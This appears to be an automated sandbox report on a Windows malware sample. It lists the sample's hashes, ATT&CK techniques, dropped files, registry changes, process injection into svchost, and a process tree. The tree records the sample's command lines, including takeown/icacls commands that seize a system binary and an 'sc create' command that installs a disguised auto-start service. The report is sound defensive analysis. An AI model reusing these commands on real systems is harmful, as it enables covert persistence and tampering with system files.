e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16

Resubmissions

13/06/2024, 06:10 UTC

240613-gxea3sxamg 8

Analysis

max time kernel
300s
max time network
300s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
13/06/2024, 06:10 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe
Size

223KB
MD5

3955af54fbac1e43c945f447d92e4108
SHA1

53c5552c3649619e4e8c6a907b94573f47130fa4
SHA256

e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16
SHA512

fa028a040a5f075296aebab7f63a59b6cbba32ee0964dfc08768396cc012ff5d861191e2478914d79d4a424c3bba110505a58b97376c44c716f0b1ea70551037
SSDEEP

3072:tneBqhy5aVLOwqI8sgwoEHXfwaNUM+/ORSs5G2Ms4f6TFZbhgvbUxzJ8Y:tETlsgOfDt+/V6JQO98

Score

8^/10

discovery execution exploit persistence upx

Malware Config

Signatures

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
3836	takeown.exe
2352	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation	e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe

Executes dropped EXE 2 IoCs

pid	Process
3124	wmpnetwk.exe
1632	wmixedwk.exe

Loads dropped DLL 2 IoCs

pid	Process
3124	wmpnetwk.exe
1632	wmixedwk.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3836	takeown.exe
2352	icacls.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3832-74-0x0000000140000000-0x0000000140138000-memory.dmp	upx
behavioral2/memory/3832-77-0x0000000140000000-0x0000000140138000-memory.dmp	upx
behavioral2/memory/3784-91-0x0000000140000000-0x000000014011B000-memory.dmp	upx
behavioral2/memory/3784-90-0x0000000140000000-0x000000014011B000-memory.dmp	upx
behavioral2/memory/3832-78-0x0000000140000000-0x0000000140138000-memory.dmp	upx
behavioral2/memory/3832-75-0x0000000140000000-0x0000000140138000-memory.dmp	upx
behavioral2/memory/3832-73-0x0000000140000000-0x0000000140138000-memory.dmp	upx

Drops file in System32 directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\3832.hecate	svchost.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\3312.hecate	svchost.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\1912.hecate	svchost.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\4972.hecate	svchost.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\1636.hecate	svchost.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\2876.hecate	svchost.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\1704.hecate	svchost.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\1532.hecate	svchost.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\3784.hecate	svchost.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\5064.hecate	svchost.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\1916.hecate	svchost.exe
File opened for modification	C:\Windows\System32\config\systemprofile\AppData\Local\3412.hecate	svchost.exe

Suspicious use of SetThreadContext 14 IoCs

description	pid	Process	procid_target
PID 1632 set thread context of 4344	1632	wmixedwk.exe	92
PID 4344 set thread context of 3832	4344	svchost.exe	93
PID 4344 set thread context of 4720	4344	svchost.exe	94
PID 4344 set thread context of 3784	4344	svchost.exe	95
PID 4344 set thread context of 5064	4344	svchost.exe	107
PID 4344 set thread context of 1916	4344	svchost.exe	109
PID 4344 set thread context of 3312	4344	svchost.exe	110
PID 4344 set thread context of 3412	4344	svchost.exe	111
PID 4344 set thread context of 1912	4344	svchost.exe	112
PID 4344 set thread context of 1636	4344	svchost.exe	113
PID 4344 set thread context of 2876	4344	svchost.exe	114
PID 4344 set thread context of 4972	4344	svchost.exe	115
PID 4344 set thread context of 1704	4344	svchost.exe	116
PID 4344 set thread context of 1532	4344	svchost.exe	117

Drops file in Program Files directory 21 IoCs

description	ioc	Process
File created	C:\Program Files\Windows Media Player\wmixedwk.exe	e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe
File opened for modification	C:\Program Files\Windows Media Player\mpsvc.dll	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpa	svchost.exe
File created	C:\Program Files\Windows Media Player\down_info	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File created	C:\Program Files\Windows Media Player\wmpnetwk.exe	e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxds	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpp	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File created	C:\Program Files\Windows Media Player\background.jpg	e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe
File created	C:\Program Files\Windows Media Player\mpsvc.dll	e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe
File opened for modification	C:\Program Files\Windows Media Player\wmixedwk.exe	e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe
File opened for modification	C:\Program Files\Windows Media Player\ppqqxpb	svchost.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2032	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp2\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-172 = "Microsoft PowerPoint 97-2003 Slide Show"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@"C:\Windows\system32\windowspowershell\v1.0\powershell.exe",-105 = "Windows PowerShell XML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@windows.storage.dll,-34583 = "Saved Pictures"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{97E467B4-98C6-4F19-9588-161B7773D6F6} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000d8b67a8258bdda01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-114 = "OpenDocument Spreadsheet"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1E589E9D-8A8D-46D9-A2F9-E6D4F8161EE9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000e7381f8358bdda01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\Windows.UI.Immersive.dll,-38304 = "Public Account Pictures"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-178 = "OpenDocument Presentation"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000005cc8ac8258bdda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\searchfolder.dll,-9023 = "Saved Search"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xht	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9908 = "Wave Sound"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Multimedia	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-107 = "Microsoft Excel Comma Separated Values File"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions	SearchFilterHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{3DBEE9A1-C471-4B95-BBCA-F39310064458} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000e3686c8258bdda01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\zipfldr.dll,-10195 = "Compressed (zipped) Folder"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-174 = "Microsoft PowerPoint Presentation"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\acppage.dll,-6002 = "Windows Batch File"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp2	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9939 = "ADTS Audio"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\cabview.dll,-20 = "Cabinet File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9909 = "Windows Media Audio/Video file"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-111 = "Microsoft Excel Macro-Enabled Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-915 = "XHTML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-176 = "Microsoft PowerPoint Macro-Enabled Presentation"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{AEB16279-B750-48F1-8586-97956060175A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000f404898258bdda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.DVR-MS	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9934 = "AVCHD Video"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-142 = "Microsoft OneNote Table Of Contents"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000008da3678258bdda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-177 = "Microsoft PowerPoint Macro-Enabled Slide Show"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5383EF74-273B-4278-AB0C-CDAA9FD5369E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000b0eed28258bdda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\wmphoto.dll,-500 = "Windows Media Photo"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-180 = "Microsoft PowerPoint 97-2003 Template"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9936 = "QuickTime Movie"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-10046 = "Internet Shortcut"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E46787A1-4629-4423-A693-BE1F003B2742} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000a2a2868258bdda01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9912 = "Windows Media Audio file"	SearchProtocolHost.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1792	PING.EXE

Suspicious use of AdjustPrivilegeToken 27 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	3836	takeown.exe
Token: 33	5084	SearchIndexer.exe
Token: SeIncBasePriorityPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe
Token: SeTakeOwnershipPrivilege	5084	SearchIndexer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2120 wrote to memory of 744	2120	e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe	85
PID 2120 wrote to memory of 744	2120	e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe	85
PID 744 wrote to memory of 3836	744	cmd.exe	87
PID 744 wrote to memory of 3836	744	cmd.exe	87
PID 744 wrote to memory of 2352	744	cmd.exe	88
PID 744 wrote to memory of 2352	744	cmd.exe	88
PID 1632 wrote to memory of 4344	1632	wmixedwk.exe	92
PID 1632 wrote to memory of 4344	1632	wmixedwk.exe	92
PID 1632 wrote to memory of 4344	1632	wmixedwk.exe	92
PID 1632 wrote to memory of 4344	1632	wmixedwk.exe	92
PID 1632 wrote to memory of 4344	1632	wmixedwk.exe	92
PID 1632 wrote to memory of 4344	1632	wmixedwk.exe	92
PID 1632 wrote to memory of 4344	1632	wmixedwk.exe	92
PID 1632 wrote to memory of 4344	1632	wmixedwk.exe	92
PID 1632 wrote to memory of 4344	1632	wmixedwk.exe	92
PID 1632 wrote to memory of 4344	1632	wmixedwk.exe	92
PID 1632 wrote to memory of 4344	1632	wmixedwk.exe	92
PID 4344 wrote to memory of 3832	4344	svchost.exe	93
PID 4344 wrote to memory of 3832	4344	svchost.exe	93
PID 4344 wrote to memory of 3832	4344	svchost.exe	93
PID 4344 wrote to memory of 3832	4344	svchost.exe	93
PID 4344 wrote to memory of 3832	4344	svchost.exe	93
PID 4344 wrote to memory of 3832	4344	svchost.exe	93
PID 4344 wrote to memory of 3832	4344	svchost.exe	93
PID 4344 wrote to memory of 4720	4344	svchost.exe	94
PID 4344 wrote to memory of 4720	4344	svchost.exe	94
PID 4344 wrote to memory of 4720	4344	svchost.exe	94
PID 4344 wrote to memory of 4720	4344	svchost.exe	94
PID 4344 wrote to memory of 4720	4344	svchost.exe	94
PID 4344 wrote to memory of 4720	4344	svchost.exe	94
PID 4344 wrote to memory of 4720	4344	svchost.exe	94
PID 4344 wrote to memory of 4720	4344	svchost.exe	94
PID 4344 wrote to memory of 4720	4344	svchost.exe	94
PID 4344 wrote to memory of 4720	4344	svchost.exe	94
PID 4344 wrote to memory of 4720	4344	svchost.exe	94
PID 4344 wrote to memory of 3784	4344	svchost.exe	95
PID 4344 wrote to memory of 3784	4344	svchost.exe	95
PID 4344 wrote to memory of 3784	4344	svchost.exe	95
PID 4344 wrote to memory of 3784	4344	svchost.exe	95
PID 4344 wrote to memory of 3784	4344	svchost.exe	95
PID 4344 wrote to memory of 3784	4344	svchost.exe	95
PID 4344 wrote to memory of 3784	4344	svchost.exe	95
PID 2120 wrote to memory of 1164	2120	e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe	96
PID 2120 wrote to memory of 1164	2120	e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe	96
PID 2120 wrote to memory of 2468	2120	e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe	98
PID 2120 wrote to memory of 2468	2120	e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe	98
PID 1164 wrote to memory of 2032	1164	cmd.exe	100
PID 1164 wrote to memory of 2032	1164	cmd.exe	100
PID 2468 wrote to memory of 1792	2468	cmd.exe	101
PID 2468 wrote to memory of 1792	2468	cmd.exe	101
PID 5084 wrote to memory of 4584	5084	SearchIndexer.exe	102
PID 5084 wrote to memory of 4584	5084	SearchIndexer.exe	102
PID 5084 wrote to memory of 1508	5084	SearchIndexer.exe	103
PID 5084 wrote to memory of 1508	5084	SearchIndexer.exe	103
PID 4344 wrote to memory of 5064	4344	svchost.exe	107
PID 4344 wrote to memory of 5064	4344	svchost.exe	107
PID 4344 wrote to memory of 5064	4344	svchost.exe	107
PID 4344 wrote to memory of 5064	4344	svchost.exe	107
PID 4344 wrote to memory of 5064	4344	svchost.exe	107
PID 4344 wrote to memory of 5064	4344	svchost.exe	107
PID 4344 wrote to memory of 5064	4344	svchost.exe	107
PID 4344 wrote to memory of 1916	4344	svchost.exe	109
PID 4344 wrote to memory of 1916	4344	svchost.exe	109
PID 4344 wrote to memory of 1916	4344	svchost.exe	109

C:\Users\Admin\AppData\Local\Temp\e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe
"C:\Users\Admin\AppData\Local\Temp\e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2120
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" cmd /c takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe" && icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:744
- - C:\Windows\system32\takeown.exe
    takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3836
- - C:\Windows\system32\icacls.exe
    icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2352
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" cmd /c sc create "Accecss Auto Connetcion Manager" binPath= "C:\Program Files\Windows Media Player\wmixedwk.exe" START= auto DISPLAYNAME= "WebServer" TYPE= own
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1164
- - C:\Windows\system32\sc.exe
    sc create "Accecss Auto Connetcion Manager" binPath= "C:\Program Files\Windows Media Player\wmixedwk.exe" START= auto DISPLAYNAME= "WebServer" TYPE= own
    3⤵
    - Launches sc.exe
    PID:2032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\kkxqbh.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2468
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 3
    3⤵
    - Runs ping.exe
    PID:1792

C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5084
- C:\Windows\system32\SearchProtocolHost.exe
  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  2⤵
  - Modifies data under HKEY_USERS
  PID:4584
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 784
  2⤵
  - Modifies data under HKEY_USERS
  PID:1508

C:\Program Files\Windows Media Player\wmpnetwk.exe
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3124

C:\Program Files\Windows Media Player\wmixedwk.exe
"C:\Program Files\Windows Media Player\wmixedwk.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1632
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe
  2⤵
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:4344
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    PID:3832
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    - Drops file in Program Files directory
    PID:4720
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    PID:3784
- - C:\Windows\system32\svchost.exe
    "C:\Windows\system32\svchost.exe"
